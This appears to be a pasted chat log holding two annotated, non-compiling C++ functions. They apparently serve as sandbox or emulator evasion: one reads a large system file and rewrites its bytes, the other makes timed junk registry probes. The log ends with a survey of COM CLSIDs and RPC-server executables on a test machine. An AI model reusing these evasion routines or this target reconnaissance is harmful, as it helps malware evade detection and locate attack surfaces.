// Returns a heap buffer (new[]; ownership passes to the caller, nothing here
// frees it) filled from one file in the system directory, with every zero byte
// in the first fileSize bytes replaced by a non-zero value derived from its
// index, and buf[fileSize - 1] forced to '\0'.
//
// Observable behaviour (useful when reading API-monitor or sandbox traces):
// two GetSystemDirectoryA calls, a FindFirstFileA/FindNextFileA walk of that
// directory, then a single CreateFileA/ReadFile of one file larger than
// 150000 bytes taken from it.
//
// NOTE(review): this is a verbatim gist paste and does not compile as shown —
// the line `StringCchCopyA(..., ffd.cFileName;)` has ';' and ')' transposed,
// and the "\\\*" / "\\\" literals are malformed (presumably "\\*" and "\\",
// i.e. the search pattern "<sysdir>\*" and a path separator). Left untouched
// here; confirm against the original source before relying on it.
char* GetRandomBuf()
{
    char tempFileName[MAX_PATH];      // search pattern: <system dir>\*
    char targetFileName[MAX_PATH];    // chosen file:    <system dir>\<name>
    // random
    size_t randomNum = 8;             // fixed despite the comment; reduced modulo count below
    WIN32_FIND_DATAA ffd;             // read by the do/while even if FindFirstFileA fails (then uninitialized)
    DWORD size = 0;                   // byte size of the chosen file (low 32 bits)
    GetSystemDirectoryA((LPSTR)tempFileName, (UINT)MAX_PATH);
    GetSystemDirectoryA((LPSTR)targetFileName, (UINT)MAX_PATH);
    // sic: "\\\*" contains the invalid escape "\*" in the paste (see header note)
    StringCchCatA(tempFileName, MAX_PATH, "\\\*");
    HANDLE f = FindFirstFileA(tempFileName, &ffd);   // not checked against INVALID_HANDLE_VALUE
    size_t count = 0;                                // candidate files recorded (at most 5000)
    char** fileNamesArr = new char*[5000];           // 5000 name slots of MAX_PATH bytes; never freed (the delete[] is commented out below)
    DWORD rbRead;                                    // bytes read by ReadFile; never compared with size
    for (size_t i = 0; i < 5000; ++i)
        fileNamesArr[i] = new char[MAX_PATH];
    // set randomly
    size_t fileSize = 150000;   // fixed despite the comment: a file qualifies only if larger than this; also the length of the output that gets post-processed
    do
    {
        if (!(ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
        {
            if (ffd.nFileSizeLow > fileSize)   // only the low 32 bits of the size are compared
            {
                int a = 1;   // a and b are dead: written below, never read
                int b = 2;
                // sic: ';' and ')' are transposed in the paste (see header note)
                StringCchCopyA(fileNamesArr[count], MAX_PATH, ffd.cFileName;)
                ++count;
                a += b + count;
            }
        }
    } while (FindNextFileA(f, &ffd) && count < 5000);
    FindClose((HANDLE)f);
    randomNum %= count;   // selects slot 8 mod count; divides by zero when no file qualified (count == 0)
    // sic: "\\\" is an unterminated literal in the paste; a single "\\" (one backslash as path separator) is the only reading that fits the next line
    StringCchCatA(targetFileName, MAX_PATH, "\\\");
    StringCchCatA(targetFileName, MAX_PATH, fileNamesArr[randomNum]);
    // share mode 0 (third argument): the open fails if another process already has the file open; the handle is not checked
    HANDLE hFile = CreateFileA(targetFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
    size = (DWORD)GetFileSize((HANDLE)hFile, nullptr);   // INVALID_FILE_SIZE on failure is not handled
    char* buf = new char[size];
    ReadFile((HANDLE)hFile, buf, size, &rbRead, nullptr);   // return value and rbRead are ignored
    // Replace every zero byte within the first fileSize bytes (fileSize < size, assuming
    // GetFileSize succeeded, because the file was chosen for being larger than fileSize).
    // After each replacement the scan restarts from the beginning; it still terminates
    // because the byte written is never 0.
    for (DWORD i = 0; i < fileSize; ++i)
    {
        if (buf[i] == 0)
        {
            size_t z = i;
            size_t t = i * 32;
            size_t y = i * 123 - 44 + i;   // unsigned arithmetic: wraps for i == 0, but t is 0 there so z stays 0
            z = t * y % 255;               // 0..254
            if (z != 0)
                buf[i] = z;                // size_t narrowed to char
            else
                buf[i] = z + 23;           // never write 0 back
            i = 0;                         // restart: after ++i the next index checked is 1
        }
    }
    /*delete[] fileNamesArr;
    pCloseHandle(hFile);
    */
    // Neither fileNamesArr (and its 5000 entries) nor hFile is released; see the commented-out block above.
    buf[fileSize - 1] = 0;   // terminate at 150000 bytes; bytes from fileSize up to size keep the raw file content
    return buf;
}
[24.09.21 15:37:40] orval: ``
// Slices 11-byte names out of buf (one every 40 bytes) and tries to open each
// as a sub-key of HKEY_CURRENT_USER; for every name whose open does not come
// back as ERROR_FILE_NOT_FOUND it additionally queries a fixed value name and
// counts the query failing. Returns true once more than 10 such probes were
// counted.
//
// buf       : NUL-terminated byte string the names are cut from. The caller is
//             not on this page; GetRandomBuf's output is the natural candidate
//             but that is an inference.
// startTime : a GetTickCount() reading taken by the caller; the loop gives up
//             after 20 000 ms measured from it.
//
// Observable behaviour: a burst of RegOpenKeyExA(HKEY_CURRENT_USER, <11
// arbitrary bytes>) calls, each followed by RegQueryValueExA("zsadsgjea") when
// the open did not report "not found". None of the opened keys is closed.
//
// NOTE(review): StrLen, MyHeapAlloc and m_memcpy are project helpers that are
// not defined on this page; their behaviour is assumed from the names.
bool QueryReg(char* buf, DWORD startTime)
{
    size_t result = 0;        // probes where the open did not say "not found" but the value query failed
    LSTATUS errCode = 0;
    HKEY hKey;                // written by RegOpenKeyExA; never passed to RegCloseKey, so successful opens leak
    size_t step = 0;          // byte offset into buf of the current probe name
    //do random
    char* parameterName = (char*) "zsadsgjea";       // fixed value name despite the comment
    //do random
    char* parameterValue = (char*) "svogfiifotuz";   // string literal used as the *output* buffer of RegQueryValueExA below — writing into it is undefined behaviour
    DWORD dataSize = 12;      // in/out size for RegQueryValueExA; not reset between iterations, so a successful query shrinks it for the next one
    // size_t arithmetic: when StrLen(buf) < 18 the bound wraps to a huge value and step runs past the end of buf.
    while (step < StrLen(buf) - 18)
    {
        char* temp = (char*)MyHeapAlloc(12);// new char[12];
        temp[11] = 0;                        // 11 name bytes + terminator
        m_memcpy(temp, buf + step, 11);      // the next 11 bytes of buf become the sub-key name
        errCode = (LSTATUS)RegOpenKeyExA((HKEY)HKEY_CURRENT_USER, temp, (DWORD)0, (REGSAM)KEY_READ, &hKey);
        // Anything other than "key does not exist" is treated as an open; hKey is only meaningful when RegOpenKeyExA actually succeeded
        if (errCode != ERROR_FILE_NOT_FOUND && hKey)
        {
            errCode = (LSTATUS)RegQueryValueExA(hKey, (LPCSTR)parameterName, nullptr, nullptr, (LPBYTE)parameterValue, &dataSize);
            if (errCode != ERROR_SUCCESS && hKey)   // the hKey test is redundant here (already checked above)
                ++result;
        }
        //step += 18;
        step += 40;          // stride between probe names; the commented-out line shows the earlier value 18, which the loop bound still uses
        free(temp);          // temp came from MyHeapAlloc, not malloc — only correct if that helper wraps malloc; cannot tell from here
        if ((DWORD)GetTickCount() - startTime > 1000 * 20)
            break;           // 20 s budget
    }
    return result > 10;
}
HKEY_CLASSES_ROOT\CLSID\{27F71832-6815-48CB-902A-7A1D891BA962} - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{294935CE-F637-4E7C-A41B-AB255460B862} - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{41FCCC3A-1FA1-4949-953A-6EE61C46A4D1} Microsoft.Audio.AudioClient Binder - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{444F7305-1D7D-4BE9-8C29-CC3F1D220C40} - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{562462DD-4F9A-4110-9D6A-C3CA0407FF76} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{69A95A38-C637-46A0-9FB2-1C939AEBF2E8} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{6EC153C1-371E-47E1-A896-2F7F80EB7842} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{73843B93-848F-453B-953D-2E5B911429DC} - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{870AF99C-171D-4f9e-AF0D-E63DF40C2BC9} - 9 cmd
HKEY_CLASSES_ROOT\CLSID\{8D9945C3-A621-4F52-8641-6D8B755F42E2} - 12 cmd system blocked
HKEY_CLASSES_ROOT\CLSID\{ede7f087-890f-491c-b906-9abb31896960} CLSID_EuVolumeNotificationCallback - 0 cmd
HKEY_CLASSES_ROOT\CLSID\{FD7F2B29-24D0-4B5C-B177-592C39F9CA10} psfactorybuffer - 2 cmd
Negative result by audio so far
In particular, here are all the RPC servers on the test machine
[+] Exe starting RPC Server: C:\Windows\System32\AppVShNotify.exe
[+] Exe starting RPC Server: C:\Windows\System32\BioIso.exe
[+] Exe starting RPC Server: C:\Windows\System32\ByteCodeGenerator.exe
[+] Exe starting RPC Server: C:\Windows\System32\FsIso.exe
[+] Exe starting RPC Server: C:\Windows\System32\FXSSVC.exe
[+] Exe starting RPC Server: C:\Windows\System32\LsaIso.exe
[+] Exe starting RPC Server: C:\Windows\System32\lsass.exe
[+] Exe starting RPC Server: C:\Windows\System32\mpnotify.exe
[+] Exe starting RPC Server: C:\Windows\System32\NetEvtFwdr.exe
[+] Exe starting RPC Server: C:\Windows\System32\NgcIso.exe
[+] Exe starting RPC Server: C:\Windows\System32\rdpclip.exe
[+] Exe starting RPC Server: C:\Windows\System32\rdpinit.exe
[+] Exe starting RPC Server: C:\Windows\System32\rdpshell.exe
[+] Exe starting RPC Server: C:\Windows\System32\services.exe
[+] Exe starting RPC Server: C:\Windows\System32\SgrmLpac.exe
[+] Exe starting RPC Server: C:\Windows\System32\svchost.exe
[+] Exe starting RPC Server: C:\Windows\System32\TCPSVCS.EXE
[+] Exe starting RPC Server: C:\Windows\System32\WaaSMedicAgent.exe
[+] Exe starting RPC Server: C:\Windows\System32\wimserv.exe
[+] Exe starting RPC Server: C:\Windows\System32\wininit.exe
[+] Exe starting RPC Server: C:\Windows\System32\winlogon.exe
[+] Exe starting RPC Server: C:\Windows\System32\wlanext.exe
[+] Exe starting RPC Server: C:\Windows\System32\IME\IMJP\IMJPDCT.EXE